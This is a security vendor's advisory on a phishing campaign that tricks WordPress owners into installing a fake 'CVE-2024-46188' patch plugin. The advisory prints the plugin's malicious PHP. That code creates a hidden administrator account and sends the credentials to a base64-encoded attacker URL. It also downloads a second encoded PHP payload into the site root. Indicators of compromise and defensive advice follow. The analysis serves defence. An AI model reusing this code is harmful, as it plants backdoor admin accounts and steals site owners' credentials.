Introduction
In the ever-evolving landscape of cybersecurity threats, a new, convincing spear phishing attack has emerged, specifically targeting WordPress website owners. This sophisticated scam, masquerading as an urgent security update from WordPress, exploits the trust of users to execute a malicious agenda. This article delves into the mechanics of this threat, providing insights and actionable advice to safeguard your digital presence.
The Spear Phishing Email
The attack initiates with an email that impersonates the WordPress development team. It warns recipients of a critical Remote Command Execution (RCE) vulnerability, identified as CVE-2024-46188, in the WordPress core. The email, marked by a sense of urgency and panic, instructs users to download and install a plugin that ostensibly patches this vulnerability.
Highlighted in red, the fraudulent domain used to send the email.
The Fake WordPress Plugin
The plugin, deceptively named “WordPress Patch CVE-2024-46188“, is presented on a website mimicking the official WordPress plugin directory. A notable red flag is a “verified” checkmark next to the plugin developer’s name, a feature absent on the legitimate WordPress site.
Side-by-side comparison of the legitimate and fake WordPress plugin pages.
Technical Breakdown of the Malicious Plugin
SKXWM(), is designed to compromise website security. This function covertly creates a new admin user, granting attackers full control over the WordPress site. It then sends the new user credentials, along with the site URL and user IP, to a remote server. The data exfiltration destination is obfusticated using base64 encoding, making detection challenging for the untrained eye. Malicious User Creation
The unauthorized user is created using the function CTFCV() which uses a randomization function to generate the user’s password, and creates the username as a SHA-256 hash of the victim website’s URL.
function YSSDP($salt = "") {
$siteUrl = get_option('siteurl');
$shortName = substr(hash('sha256', $salt.$siteUrl), -7);
return str_replace("=", "", base64_encode($shortName));
}
function CTFCV($password) {
require(__DIR__.'/../../../wp-includes/registration.php');
if (!username_exists(YSSDP())) {
$user_id = wp_create_user(YSSDP(), $password);
$user = new WP_User($user_id);
$user->set_role('administrator');
}
}
function YSSDP($salt = "") {
$siteUrl = get_option('siteurl');
$shortName = substr(hash('sha256', $salt.$siteUrl), -7);
return str_replace("=", "", base64_encode($shortName));
}
Credential Exfiltration & Secondary Payload
scanningToken, which contains a Base64 encoded URL.
A HTTP GET request is then made to the decoded URL containing the location of the victim website, the newly created user, and additional details.
After the credentials are exfiltrated, a secondary payload is installed in the WordPress core via the COYGC() function, which retrieves the secondary payload from https://defcve[.]com/runscan , containing Base64 encoded PHP, which appears to be the ACE in-browser IDE, also containing additional modifications.
function SKXWM() {
add_option( 'Activated_Plugin', 'Wordpress Security' );
$siteUrl = get_option('siteurl');
/* activation code here */
$testRandomPassword = YRNZL(10);
$message = "url: $siteUrl\nuser: ".YSSDP()."\npassword: $testRandomPassword\nscanned result: $siteUrl/".YPRXK()."\n\nuserip: ".FRYYD()."\n ---";
$scanningToken = "aHR0cHM6Ly9kZWZjdmUuY29tL3dwYXBpP3NpdGV1cmw9";
file_get_contents(base64_decode($scanningToken).urlencode(base64_encode($message)));
CTFCV($testRandomPassword);
COYGC();
wp_redirect( admin_url( 'admin.php?page=wordpress-security' ) );
}
function COYGC() {
$scanningToken = "aHR0cHM6Ly9kZWZjdmUuY29tL3J1bnNjYW4=";
$contents = @file_get_contents(base64_decode($scanningToken));
@file_put_contents(__DIR__.'/'.YPRXK(), base64_decode($contents));
copy(__DIR__.'/'.YPRXK(), __DIR__.'/../../../'.YPRXK());
}
Indicators of Compromise (IOCs)
The following indicators of compromise should be observed when investigating a potential security threat within your hosting environment and WordPress website:
Domain Names:
- mailing-wordpress[.]org
- en-wordpress[.]org
- us.en-wordpress[.]org
- defcve[.]com
Email Addresses:
- no-reply[@]mailing-wordpress.com
URLs:
- https://us.en-wordpress[.]org/plugins/cve-2024-46188/
- https://defcve[.]com/wpapi?siteurl=
- https://defcve[.]com/runsccan
Other Indicators:
- CVE-2024-46188 (This CVE does not yet exist, and is illegitimate)
Protecting Yourself and Your WordPress Site
To avoid falling prey to such attacks, always verify the authenticity of emails claiming to be from WordPress. Be cautious of urgent language and unsolicited downloads. Regularly update your WordPress site and plugins from official sources and consider using security plugins for enhanced protection.
What to Do If You Suspect a Compromise
If you suspect that your site has been compromised, immediately change all passwords and user roles, and scan your site for unauthorized plugins or users. It’s crucial to involve cybersecurity professionals who can thoroughly investigate and remediate the issue.
If your website has been affected, or if you’re unsure about your site’s security, contact our US-based critical incident response team for immediate, expert assistance. Our dedicated team specializes in resolving complex cybersecurity challenges and ensuring your digital assets are secure.
Concerned your systems are compromised?
Additional information and details will be published as they are received. For IOC and code samples, please reach out via our contact form, or other methods of contact.
